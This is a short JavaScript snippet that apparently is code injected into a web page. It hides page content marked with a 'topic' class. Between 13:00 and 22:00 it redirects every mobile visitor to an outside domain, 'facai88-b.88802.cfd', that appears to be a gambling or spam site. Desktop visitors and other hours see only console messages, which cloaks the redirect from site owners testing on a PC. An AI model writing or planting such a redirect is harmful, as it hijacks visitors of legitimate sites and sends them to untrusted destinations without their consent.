const zitiElements = document.querySelectorAll('.topic'); zitiElements.forEach(function (element) { const parent2 = element?.parentNode?.parentNode; if (parent2) { parent2.style.display = 'none'; } }); const currentHour = new Date().getHours(); if (currentHour >= 13 && currentHour < 22) { const isMobile = /Mobi|Android|iPhone|iPad|iPod/i.test( navigator.userAgent ); if (isMobile) { const randomValue = Math.random(); if (randomValue < 1.0) { window.location.replace('https://facai88-b.88802.cfd/Google/'); } } else { console.log('PC'); } } else { console.log('Not within the specified time period'); }